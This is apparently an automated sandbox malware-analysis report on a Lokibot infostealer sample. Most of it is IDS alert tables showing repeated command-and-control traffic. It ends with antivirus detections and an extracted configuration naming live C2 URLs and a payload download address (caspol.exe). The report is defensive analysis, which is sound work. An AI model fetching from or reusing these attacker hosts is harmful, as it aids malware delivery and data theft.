            2024-11-20T10:58:50.369375+010020243181Malware Command and Control Activity Detected192.168.2.45883894.156.177.4180TCP
            2024-11-20T10:58:51.270204+010020243181Malware Command and Control Activity Detected192.168.2.45883994.156.177.4180TCP
            2024-11-20T10:58:52.210518+010020243181Malware Command and Control Activity Detected192.168.2.45884094.156.177.4180TCP
            2024-11-20T10:58:53.245528+010020243181Malware Command and Control Activity Detected192.168.2.45884194.156.177.4180TCP
            2024-11-20T10:58:54.194984+010020243181Malware Command and Control Activity Detected192.168.2.45884294.156.177.4180TCP
            2024-11-20T10:58:55.228559+010020243181Malware Command and Control Activity Detected192.168.2.45884394.156.177.4180TCP
            2024-11-20T10:58:56.119265+010020243181Malware Command and Control Activity Detected192.168.2.45884494.156.177.4180TCP
            2024-11-20T10:58:57.203522+010020243181Malware Command and Control Activity Detected192.168.2.45884594.156.177.4180TCP
            2024-11-20T10:58:58.145779+010020243181Malware Command and Control Activity Detected192.168.2.45884694.156.177.4180TCP
            2024-11-20T10:58:59.067132+010020243181Malware Command and Control Activity Detected192.168.2.45884794.156.177.4180TCP
            2024-11-20T10:59:00.142398+010020243181Malware Command and Control Activity Detected192.168.2.45884894.156.177.4180TCP
            2024-11-20T10:59:01.196244+010020243181Malware Command and Control Activity Detected192.168.2.45884994.156.177.4180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-20T10:57:12.808002+010020216411A Network Trojan was detected192.168.2.44973494.156.177.4180TCP
            2024-11-20T10:57:13.757343+010020216411A Network Trojan was detected192.168.2.44973594.156.177.4180TCP
            2024-11-20T10:57:15.026901+010020216411A Network Trojan was detected192.168.2.44973794.156.177.4180TCP
            2024-11-20T10:57:16.128443+010020216411A Network Trojan was detected192.168.2.44973994.156.177.4180TCP
            2024-11-20T10:57:17.172162+010020216411A Network Trojan was detected192.168.2.44974094.156.177.4180TCP
            2024-11-20T10:57:18.095135+010020216411A Network Trojan was detected192.168.2.44974294.156.177.4180TCP
            2024-11-20T10:57:19.188469+010020216411A Network Trojan was detected192.168.2.44974694.156.177.4180TCP
            2024-11-20T10:57:20.015773+010020216411A Network Trojan was detected192.168.2.44974894.156.177.4180TCP
            2024-11-20T10:57:21.098851+010020216411A Network Trojan was detected192.168.2.44975094.156.177.4180TCP
            2024-11-20T10:57:22.128961+010020216411A Network Trojan was detected192.168.2.44975194.156.177.4180TCP
            2024-11-20T10:57:23.051375+010020216411A Network Trojan was detected192.168.2.44975294.156.177.4180TCP
            2024-11-20T10:57:23.952106+010020216411A Network Trojan was detected192.168.2.44975394.156.177.4180TCP
            2024-11-20T10:57:24.855713+010020216411A Network Trojan was detected192.168.2.44975494.156.177.4180TCP
            2024-11-20T10:57:25.934109+010020216411A Network Trojan was detected192.168.2.44975594.156.177.4180TCP
            2024-11-20T10:57:26.983156+010020216411A Network Trojan was detected192.168.2.44975694.156.177.4180TCP
            2024-11-20T10:57:27.893409+010020216411A Network Trojan was detected192.168.2.44975794.156.177.4180TCP
            2024-11-20T10:57:28.799350+010020216411A Network Trojan was detected192.168.2.44975894.156.177.4180TCP
            2024-11-20T10:57:29.726326+010020216411A Network Trojan was detected192.168.2.44975994.156.177.4180TCP
            2024-11-20T10:57:30.667112+010020216411A Network Trojan was detected192.168.2.44976094.156.177.4180TCP
            2024-11-20T10:57:31.597321+010020216411A Network Trojan was detected192.168.2.44976194.156.177.4180TCP
            2024-11-20T10:57:32.534728+010020216411A Network Trojan was detected192.168.2.44976294.156.177.4180TCP
            2024-11-20T10:57:33.800604+010020216411A Network Trojan was detected192.168.2.44976394.156.177.4180TCP
            2024-11-20T10:57:34.722224+010020216411A Network Trojan was detected192.168.2.45848994.156.177.4180TCP
            2024-11-20T10:57:35.630460+010020216411A Network Trojan was detected192.168.2.45849194.156.177.4180TCP
            2024-11-20T10:57:36.546091+010020216411A Network Trojan was detected192.168.2.45849294.156.177.4180TCP
            2024-11-20T10:57:37.558372+010020216411A Network Trojan was detected192.168.2.45849394.156.177.4180TCP
            2024-11-20T10:57:38.444140+010020216411A Network Trojan was detected192.168.2.45849594.156.177.4180TCP
            2024-11-20T10:57:39.350219+010020216411A Network Trojan was detected192.168.2.45849794.156.177.4180TCP
            2024-11-20T10:57:40.390682+010020216411A Network Trojan was detected192.168.2.45849894.156.177.4180TCP
            2024-11-20T10:57:41.280822+010020216411A Network Trojan was detected192.168.2.45849994.156.177.4180TCP
            2024-11-20T10:57:42.194530+010020216411A Network Trojan was detected192.168.2.45850094.156.177.4180TCP
            2024-11-20T10:57:43.109049+010020216411A Network Trojan was detected192.168.2.45850194.156.177.4180TCP
            2024-11-20T10:57:44.036671+010020216411A Network Trojan was detected192.168.2.45850294.156.177.4180TCP
            2024-11-20T10:57:44.953136+010020216411A Network Trojan was detected192.168.2.45850394.156.177.4180TCP
            2024-11-20T10:57:45.861829+010020216411A Network Trojan was detected192.168.2.45850494.156.177.4180TCP
            2024-11-20T10:57:46.774217+010020216411A Network Trojan was detected192.168.2.45850594.156.177.4180TCP
            2024-11-20T10:57:47.730504+010020216411A Network Trojan was detected192.168.2.45850694.156.177.4180TCP
            2024-11-20T10:57:48.614779+010020216411A Network Trojan was detected192.168.2.45850794.156.177.4180TCP
            2024-11-20T10:57:49.520289+010020216411A Network Trojan was detected192.168.2.45850894.156.177.4180TCP
            2024-11-20T10:57:50.448704+010020216411A Network Trojan was detected192.168.2.45850994.156.177.4180TCP
            2024-11-20T10:57:51.379035+010020216411A Network Trojan was detected192.168.2.45851094.156.177.4180TCP
            2024-11-20T10:57:52.282631+010020216411A Network Trojan was detected192.168.2.45851194.156.177.4180TCP
            2024-11-20T10:57:53.201630+010020216411A Network Trojan was detected192.168.2.45851294.156.177.4180TCP
            2024-11-20T10:57:54.109455+010020216411A Network Trojan was detected192.168.2.45851394.156.177.4180TCP
            2024-11-20T10:57:55.033419+010020216411A Network Trojan was detected192.168.2.45851494.156.177.4180TCP
            2024-11-20T10:57:56.039529+010020216411A Network Trojan was detected192.168.2.45851594.156.177.4180TCP
            2024-11-20T10:57:56.955480+010020216411A Network Trojan was detected192.168.2.45851694.156.177.4180TCP
            2024-11-20T10:57:57.984069+010020216411A Network Trojan was detected192.168.2.45851894.156.177.4180TCP
            2024-11-20T10:57:58.889596+010020216411A Network Trojan was detected192.168.2.45852494.156.177.4180TCP
            2024-11-20T10:57:59.787877+010020216411A Network Trojan was detected192.168.2.45853094.156.177.4180TCP
            2024-11-20T10:58:00.691489+010020216411A Network Trojan was detected192.168.2.45853694.156.177.4180TCP
            2024-11-20T10:58:01.582641+010020216411A Network Trojan was detected192.168.2.45854394.156.177.4180TCP
            2024-11-20T10:58:02.624665+010020216411A Network Trojan was detected192.168.2.45855394.156.177.4180TCP
            2024-11-20T10:58:03.519338+010020216411A Network Trojan was detected192.168.2.45855994.156.177.4180TCP
            2024-11-20T10:58:04.545050+010020216411A Network Trojan was detected192.168.2.45856594.156.177.4180TCP
            2024-11-20T10:58:05.453999+010020216411A Network Trojan was detected192.168.2.45857294.156.177.4180TCP
            2024-11-20T10:58:06.367844+010020216411A Network Trojan was detected192.168.2.45858294.156.177.4180TCP
            2024-11-20T10:58:07.287006+010020216411A Network Trojan was detected192.168.2.45858894.156.177.4180TCP
            2024-11-20T10:58:08.176054+010020216411A Network Trojan was detected192.168.2.45859494.156.177.4180TCP
            2024-11-20T10:58:09.065860+010020216411A Network Trojan was detected192.168.2.45860094.156.177.4180TCP
            2024-11-20T10:58:09.959629+010020216411A Network Trojan was detected192.168.2.45860694.156.177.4180TCP
            2024-11-20T10:58:10.847503+010020216411A Network Trojan was detected192.168.2.45861394.156.177.4180TCP
            2024-11-20T10:58:11.824399+010020216411A Network Trojan was detected192.168.2.45862394.156.177.4180TCP
            2024-11-20T10:58:12.724589+010020216411A Network Trojan was detected192.168.2.45862994.156.177.4180TCP
            2024-11-20T10:58:13.658490+010020216411A Network Trojan was detected192.168.2.45863594.156.177.4180TCP
            2024-11-20T10:58:14.545997+010020216411A Network Trojan was detected192.168.2.45864194.156.177.4180TCP
            2024-11-20T10:58:15.460583+010020216411A Network Trojan was detected192.168.2.45865094.156.177.4180TCP
            2024-11-20T10:58:16.391719+010020216411A Network Trojan was detected192.168.2.45865794.156.177.4180TCP
            2024-11-20T10:58:17.293396+010020216411A Network Trojan was detected192.168.2.45866494.156.177.4180TCP
            2024-11-20T10:58:18.186000+010020216411A Network Trojan was detected192.168.2.45867094.156.177.4180TCP
            2024-11-20T10:58:19.112622+010020216411A Network Trojan was detected192.168.2.45867594.156.177.4180TCP
            2024-11-20T10:58:20.136054+010020216411A Network Trojan was detected192.168.2.45868394.156.177.4180TCP
            2024-11-20T10:58:21.045421+010020216411A Network Trojan was detected192.168.2.45868894.156.177.4180TCP
            2024-11-20T10:58:21.935753+010020216411A Network Trojan was detected192.168.2.45869594.156.177.4180TCP
            2024-11-20T10:58:22.855310+010020216411A Network Trojan was detected192.168.2.45870194.156.177.4180TCP
            2024-11-20T10:58:23.760310+010020216411A Network Trojan was detected192.168.2.45870894.156.177.4180TCP
            2024-11-20T10:58:24.639781+010020216411A Network Trojan was detected192.168.2.45871594.156.177.4180TCP
            2024-11-20T10:58:25.552646+010020216411A Network Trojan was detected192.168.2.45872394.156.177.4180TCP
            2024-11-20T10:58:26.433858+010020216411A Network Trojan was detected192.168.2.45873094.156.177.4180TCP
            2024-11-20T10:58:27.437349+010020216411A Network Trojan was detected192.168.2.45873694.156.177.4180TCP
            2024-11-20T10:58:28.325967+010020216411A Network Trojan was detected192.168.2.45874294.156.177.4180TCP
            2024-11-20T10:58:29.219984+010020216411A Network Trojan was detected192.168.2.45875294.156.177.4180TCP
            2024-11-20T10:58:30.135328+010020216411A Network Trojan was detected192.168.2.45875894.156.177.4180TCP
            2024-11-20T10:58:31.029059+010020216411A Network Trojan was detected192.168.2.45876494.156.177.4180TCP
            2024-11-20T10:58:31.910533+010020216411A Network Trojan was detected192.168.2.45877094.156.177.4180TCP
            2024-11-20T10:58:32.925547+010020216411A Network Trojan was detected192.168.2.45877794.156.177.4180TCP
            2024-11-20T10:58:33.816974+010020216411A Network Trojan was detected192.168.2.45878694.156.177.4180TCP
            2024-11-20T10:58:34.747068+010020216411A Network Trojan was detected192.168.2.45879294.156.177.4180TCP
            2024-11-20T10:58:35.646259+010020216411A Network Trojan was detected192.168.2.45879994.156.177.4180TCP
            2024-11-20T10:58:36.544139+010020216411A Network Trojan was detected192.168.2.45880694.156.177.4180TCP
            2024-11-20T10:58:37.437340+010020216411A Network Trojan was detected192.168.2.45881294.156.177.4180TCP
            2024-11-20T10:58:38.343067+010020216411A Network Trojan was detected192.168.2.45881894.156.177.4180TCP
            2024-11-20T10:58:39.243872+010020216411A Network Trojan was detected192.168.2.45882794.156.177.4180TCP
            2024-11-20T10:58:40.146749+010020216411A Network Trojan was detected192.168.2.45882894.156.177.4180TCP
            2024-11-20T10:58:41.034533+010020216411A Network Trojan was detected192.168.2.45882994.156.177.4180TCP
            2024-11-20T10:58:41.944294+010020216411A Network Trojan was detected192.168.2.45883094.156.177.4180TCP
            2024-11-20T10:58:42.863234+010020216411A Network Trojan was detected192.168.2.45883194.156.177.4180TCP
            2024-11-20T10:58:43.784646+010020216411A Network Trojan was detected192.168.2.45883294.156.177.4180TCP
            2024-11-20T10:58:45.036254+010020216411A Network Trojan was detected192.168.2.45883394.156.177.4180TCP
            2024-11-20T10:58:45.931402+010020216411A Network Trojan was detected192.168.2.45883494.156.177.4180TCP
            2024-11-20T10:58:46.868272+010020216411A Network Trojan was detected192.168.2.45883594.156.177.4180TCP
            2024-11-20T10:58:47.801637+010020216411A Network Trojan was detected192.168.2.45883694.156.177.4180TCP
            2024-11-20T10:58:48.719401+010020216411A Network Trojan was detected192.168.2.45883794.156.177.4180TCP
            2024-11-20T10:58:49.631590+010020216411A Network Trojan was detected192.168.2.45883894.156.177.4180TCP
            2024-11-20T10:58:50.531924+010020216411A Network Trojan was detected192.168.2.45883994.156.177.4180TCP
            2024-11-20T10:58:51.462507+010020216411A Network Trojan was detected192.168.2.45884094.156.177.4180TCP
            2024-11-20T10:58:52.365083+010020216411A Network Trojan was detected192.168.2.45884194.156.177.4180TCP
            2024-11-20T10:58:53.422435+010020216411A Network Trojan was detected192.168.2.45884294.156.177.4180TCP
            2024-11-20T10:58:54.359199+010020216411A Network Trojan was detected192.168.2.45884394.156.177.4180TCP
            2024-11-20T10:58:55.384693+010020216411A Network Trojan was detected192.168.2.45884494.156.177.4180TCP
            2024-11-20T10:58:56.456663+010020216411A Network Trojan was detected192.168.2.45884594.156.177.4180TCP
            2024-11-20T10:58:57.368693+010020216411A Network Trojan was detected192.168.2.45884694.156.177.4180TCP
            2024-11-20T10:58:58.299878+010020216411A Network Trojan was detected192.168.2.45884794.156.177.4180TCP
            2024-11-20T10:58:59.223139+010020216411A Network Trojan was detected192.168.2.45884894.156.177.4180TCP
            2024-11-20T10:59:00.315009+010020216411A Network Trojan was detected192.168.2.45884994.156.177.4180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-20T10:57:12.808002+010028257661Malware Command and Control Activity Detected192.168.2.44973494.156.177.4180TCP
            2024-11-20T10:57:13.757343+010028257661Malware Command and Control Activity Detected192.168.2.44973594.156.177.4180TCP
            2024-11-20T10:57:15.026901+010028257661Malware Command and Control Activity Detected192.168.2.44973794.156.177.4180TCP
            2024-11-20T10:57:16.128443+010028257661Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
            2024-11-20T10:57:17.172162+010028257661Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
            2024-11-20T10:57:18.095135+010028257661Malware Command and Control Activity Detected192.168.2.44974294.156.177.4180TCP
            2024-11-20T10:57:19.188469+010028257661Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
            2024-11-20T10:57:20.015773+010028257661Malware Command and Control Activity Detected192.168.2.44974894.156.177.4180TCP
            2024-11-20T10:57:21.098851+010028257661Malware Command and Control Activity Detected192.168.2.44975094.156.177.4180TCP
            2024-11-20T10:57:22.128961+010028257661Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
            2024-11-20T10:57:23.051375+010028257661Malware Command and Control Activity Detected192.168.2.44975294.156.177.4180TCP
            2024-11-20T10:57:23.952106+010028257661Malware Command and Control Activity Detected192.168.2.44975394.156.177.4180TCP
            2024-11-20T10:57:24.855713+010028257661Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
            2024-11-20T10:57:25.934109+010028257661Malware Command and Control Activity Detected192.168.2.44975594.156.177.4180TCP
            2024-11-20T10:57:26.983156+010028257661Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
            2024-11-20T10:57:27.893409+010028257661Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
            2024-11-20T10:57:28.799350+010028257661Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
            2024-11-20T10:57:29.726326+010028257661Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
            2024-11-20T10:57:30.667112+010028257661Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
            2024-11-20T10:57:31.597321+010028257661Malware Command and Control Activity Detected192.168.2.44976194.156.177.4180TCP
            2024-11-20T10:57:32.534728+010028257661Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
            2024-11-20T10:57:33.800604+010028257661Malware Command and Control Activity Detected192.168.2.44976394.156.177.4180TCP
            2024-11-20T10:57:34.722224+010028257661Malware Command and Control Activity Detected192.168.2.45848994.156.177.4180TCP
            2024-11-20T10:57:35.630460+010028257661Malware Command and Control Activity Detected192.168.2.45849194.156.177.4180TCP
            2024-11-20T10:57:36.546091+010028257661Malware Command and Control Activity Detected192.168.2.45849294.156.177.4180TCP
            2024-11-20T10:57:37.558372+010028257661Malware Command and Control Activity Detected192.168.2.45849394.156.177.4180TCP
            2024-11-20T10:57:38.444140+010028257661Malware Command and Control Activity Detected192.168.2.45849594.156.177.4180TCP
            2024-11-20T10:57:39.350219+010028257661Malware Command and Control Activity Detected192.168.2.45849794.156.177.4180TCP
            2024-11-20T10:57:40.390682+010028257661Malware Command and Control Activity Detected192.168.2.45849894.156.177.4180TCP
            2024-11-20T10:57:41.280822+010028257661Malware Command and Control Activity Detected192.168.2.45849994.156.177.4180TCP
            2024-11-20T10:57:42.194530+010028257661Malware Command and Control Activity Detected192.168.2.45850094.156.177.4180TCP
            2024-11-20T10:57:43.109049+010028257661Malware Command and Control Activity Detected192.168.2.45850194.156.177.4180TCP
            2024-11-20T10:57:44.036671+010028257661Malware Command and Control Activity Detected192.168.2.45850294.156.177.4180TCP
            2024-11-20T10:57:44.953136+010028257661Malware Command and Control Activity Detected192.168.2.45850394.156.177.4180TCP
            2024-11-20T10:57:45.861829+010028257661Malware Command and Control Activity Detected192.168.2.45850494.156.177.4180TCP
            2024-11-20T10:57:46.774217+010028257661Malware Command and Control Activity Detected192.168.2.45850594.156.177.4180TCP
            2024-11-20T10:57:47.730504+010028257661Malware Command and Control Activity Detected192.168.2.45850694.156.177.4180TCP
            2024-11-20T10:57:48.614779+010028257661Malware Command and Control Activity Detected192.168.2.45850794.156.177.4180TCP
            2024-11-20T10:57:49.520289+010028257661Malware Command and Control Activity Detected192.168.2.45850894.156.177.4180TCP
            2024-11-20T10:57:50.448704+010028257661Malware Command and Control Activity Detected192.168.2.45850994.156.177.4180TCP
            2024-11-20T10:57:51.379035+010028257661Malware Command and Control Activity Detected192.168.2.45851094.156.177.4180TCP
            2024-11-20T10:57:52.282631+010028257661Malware Command and Control Activity Detected192.168.2.45851194.156.177.4180TCP
            2024-11-20T10:57:53.201630+010028257661Malware Command and Control Activity Detected192.168.2.45851294.156.177.4180TCP
            2024-11-20T10:57:54.109455+010028257661Malware Command and Control Activity Detected192.168.2.45851394.156.177.4180TCP
            2024-11-20T10:57:55.033419+010028257661Malware Command and Control Activity Detected192.168.2.45851494.156.177.4180TCP
            2024-11-20T10:57:56.039529+010028257661Malware Command and Control Activity Detected192.168.2.45851594.156.177.4180TCP
            2024-11-20T10:57:56.955480+010028257661Malware Command and Control Activity Detected192.168.2.45851694.156.177.4180TCP
            2024-11-20T10:57:57.984069+010028257661Malware Command and Control Activity Detected192.168.2.45851894.156.177.4180TCP
            2024-11-20T10:57:58.889596+010028257661Malware Command and Control Activity Detected192.168.2.45852494.156.177.4180TCP
            2024-11-20T10:57:59.787877+010028257661Malware Command and Control Activity Detected192.168.2.45853094.156.177.4180TCP
            2024-11-20T10:58:00.691489+010028257661Malware Command and Control Activity Detected192.168.2.45853694.156.177.4180TCP
            2024-11-20T10:58:01.582641+010028257661Malware Command and Control Activity Detected192.168.2.45854394.156.177.4180TCP
            2024-11-20T10:58:02.624665+010028257661Malware Command and Control Activity Detected192.168.2.45855394.156.177.4180TCP
            2024-11-20T10:58:03.519338+010028257661Malware Command and Control Activity Detected192.168.2.45855994.156.177.4180TCP
            2024-11-20T10:58:04.545050+010028257661Malware Command and Control Activity Detected192.168.2.45856594.156.177.4180TCP
            2024-11-20T10:58:05.453999+010028257661Malware Command and Control Activity Detected192.168.2.45857294.156.177.4180TCP
            2024-11-20T10:58:06.367844+010028257661Malware Command and Control Activity Detected192.168.2.45858294.156.177.4180TCP
            2024-11-20T10:58:07.287006+010028257661Malware Command and Control Activity Detected192.168.2.45858894.156.177.4180TCP
            2024-11-20T10:58:08.176054+010028257661Malware Command and Control Activity Detected192.168.2.45859494.156.177.4180TCP
            2024-11-20T10:58:09.065860+010028257661Malware Command and Control Activity Detected192.168.2.45860094.156.177.4180TCP
            2024-11-20T10:58:09.959629+010028257661Malware Command and Control Activity Detected192.168.2.45860694.156.177.4180TCP
            2024-11-20T10:58:10.847503+010028257661Malware Command and Control Activity Detected192.168.2.45861394.156.177.4180TCP
            2024-11-20T10:58:11.824399+010028257661Malware Command and Control Activity Detected192.168.2.45862394.156.177.4180TCP
            2024-11-20T10:58:12.724589+010028257661Malware Command and Control Activity Detected192.168.2.45862994.156.177.4180TCP
            2024-11-20T10:58:13.658490+010028257661Malware Command and Control Activity Detected192.168.2.45863594.156.177.4180TCP
            2024-11-20T10:58:14.545997+010028257661Malware Command and Control Activity Detected192.168.2.45864194.156.177.4180TCP
            2024-11-20T10:58:15.460583+010028257661Malware Command and Control Activity Detected192.168.2.45865094.156.177.4180TCP
            2024-11-20T10:58:16.391719+010028257661Malware Command and Control Activity Detected192.168.2.45865794.156.177.4180TCP
            2024-11-20T10:58:17.293396+010028257661Malware Command and Control Activity Detected192.168.2.45866494.156.177.4180TCP
            2024-11-20T10:58:18.186000+010028257661Malware Command and Control Activity Detected192.168.2.45867094.156.177.4180TCP
            2024-11-20T10:58:19.112622+010028257661Malware Command and Control Activity Detected192.168.2.45867594.156.177.4180TCP
            2024-11-20T10:58:20.136054+010028257661Malware Command and Control Activity Detected192.168.2.45868394.156.177.4180TCP
            2024-11-20T10:58:21.045421+010028257661Malware Command and Control Activity Detected192.168.2.45868894.156.177.4180TCP
            2024-11-20T10:58:21.935753+010028257661Malware Command and Control Activity Detected192.168.2.45869594.156.177.4180TCP
            2024-11-20T10:58:22.855310+010028257661Malware Command and Control Activity Detected192.168.2.45870194.156.177.4180TCP
            2024-11-20T10:58:23.760310+010028257661Malware Command and Control Activity Detected192.168.2.45870894.156.177.4180TCP
            2024-11-20T10:58:24.639781+010028257661Malware Command and Control Activity Detected192.168.2.45871594.156.177.4180TCP
            2024-11-20T10:58:25.552646+010028257661Malware Command and Control Activity Detected192.168.2.45872394.156.177.4180TCP
            2024-11-20T10:58:26.433858+010028257661Malware Command and Control Activity Detected192.168.2.45873094.156.177.4180TCP
            2024-11-20T10:58:27.437349+010028257661Malware Command and Control Activity Detected192.168.2.45873694.156.177.4180TCP
            2024-11-20T10:58:28.325967+010028257661Malware Command and Control Activity Detected192.168.2.45874294.156.177.4180TCP
            2024-11-20T10:58:29.219984+010028257661Malware Command and Control Activity Detected192.168.2.45875294.156.177.4180TCP
            2024-11-20T10:58:30.135328+010028257661Malware Command and Control Activity Detected192.168.2.45875894.156.177.4180TCP
            2024-11-20T10:58:31.029059+010028257661Malware Command and Control Activity Detected192.168.2.45876494.156.177.4180TCP
            2024-11-20T10:58:31.910533+010028257661Malware Command and Control Activity Detected192.168.2.45877094.156.177.4180TCP
            2024-11-20T10:58:32.925547+010028257661Malware Command and Control Activity Detected192.168.2.45877794.156.177.4180TCP
            2024-11-20T10:58:33.816974+010028257661Malware Command and Control Activity Detected192.168.2.45878694.156.177.4180TCP
            2024-11-20T10:58:34.747068+010028257661Malware Command and Control Activity Detected192.168.2.45879294.156.177.4180TCP
            2024-11-20T10:58:35.646259+010028257661Malware Command and Control Activity Detected192.168.2.45879994.156.177.4180TCP
            2024-11-20T10:58:36.544139+010028257661Malware Command and Control Activity Detected192.168.2.45880694.156.177.4180TCP
            2024-11-20T10:58:37.437340+010028257661Malware Command and Control Activity Detected192.168.2.45881294.156.177.4180TCP
            2024-11-20T10:58:38.343067+010028257661Malware Command and Control Activity Detected192.168.2.45881894.156.177.4180TCP
            2024-11-20T10:58:39.243872+010028257661Malware Command and Control Activity Detected192.168.2.45882794.156.177.4180TCP
            2024-11-20T10:58:40.146749+010028257661Malware Command and Control Activity Detected192.168.2.45882894.156.177.4180TCP
            2024-11-20T10:58:41.034533+010028257661Malware Command and Control Activity Detected192.168.2.45882994.156.177.4180TCP
            2024-11-20T10:58:41.944294+010028257661Malware Command and Control Activity Detected192.168.2.45883094.156.177.4180TCP
            2024-11-20T10:58:42.863234+010028257661Malware Command and Control Activity Detected192.168.2.45883194.156.177.4180TCP
            2024-11-20T10:58:43.784646+010028257661Malware Command and Control Activity Detected192.168.2.45883294.156.177.4180TCP
            2024-11-20T10:58:45.036254+010028257661Malware Command and Control Activity Detected192.168.2.45883394.156.177.4180TCP
            2024-11-20T10:58:45.931402+010028257661Malware Command and Control Activity Detected192.168.2.45883494.156.177.4180TCP
            2024-11-20T10:58:46.868272+010028257661Malware Command and Control Activity Detected192.168.2.45883594.156.177.4180TCP
            2024-11-20T10:58:47.801637+010028257661Malware Command and Control Activity Detected192.168.2.45883694.156.177.4180TCP
            2024-11-20T10:58:48.719401+010028257661Malware Command and Control Activity Detected192.168.2.45883794.156.177.4180TCP
            2024-11-20T10:58:49.631590+010028257661Malware Command and Control Activity Detected192.168.2.45883894.156.177.4180TCP
            2024-11-20T10:58:50.531924+010028257661Malware Command and Control Activity Detected192.168.2.45883994.156.177.4180TCP
            2024-11-20T10:58:51.462507+010028257661Malware Command and Control Activity Detected192.168.2.45884094.156.177.4180TCP
            2024-11-20T10:58:52.365083+010028257661Malware Command and Control Activity Detected192.168.2.45884194.156.177.4180TCP
            2024-11-20T10:58:53.422435+010028257661Malware Command and Control Activity Detected192.168.2.45884294.156.177.4180TCP
            2024-11-20T10:58:54.359199+010028257661Malware Command and Control Activity Detected192.168.2.45884394.156.177.4180TCP
            2024-11-20T10:58:55.384693+010028257661Malware Command and Control Activity Detected192.168.2.45884494.156.177.4180TCP
            2024-11-20T10:58:56.456663+010028257661Malware Command and Control Activity Detected192.168.2.45884594.156.177.4180TCP
            2024-11-20T10:58:57.368693+010028257661Malware Command and Control Activity Detected192.168.2.45884694.156.177.4180TCP
            2024-11-20T10:58:58.299878+010028257661Malware Command and Control Activity Detected192.168.2.45884794.156.177.4180TCP
            2024-11-20T10:58:59.223139+010028257661Malware Command and Control Activity Detected192.168.2.45884894.156.177.4180TCP
            2024-11-20T10:59:00.315009+010028257661Malware Command and Control Activity Detected192.168.2.45884994.156.177.4180TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://94.156.177.41/maxzi/five/fre.phpAvira URL Cloud: Label: malware
            Source: http://66.63.187.231/33/caspol.exeAvira URL Cloud: Label: malware
            Source: 94.156.177.41/maxzi/five/fre.phpAvira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Roaming\wininit.exeAvira: detection malicious, Label: HEUR/AGEN.1306899
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\caspol[1].exeAvira: detection malicious, Label: HEUR/AGEN.1306899
            Source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/maxzi/five/fre.php"]}
            Source: goodtoseeuthatgreatthingswithentirethingsgreatfor.htaReversingLabs: Detection: 15%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
            Source: C:\Users\user\AppData\Roaming\wininit.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\caspol[1].exeJoe Sandbox ML: detected
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb04P source: powershell.exe, 00000003.00000002.1704971500.0000000007B57000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1704660304.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: $iq7C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.pdb source: powershell.exe, 00000001.00000002.1813801603.0000000004E57000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 9_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,9_2_00403D74

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49742 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49742 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49742 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49742 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49746 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49746 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49746 -> 94.156.177.41:80
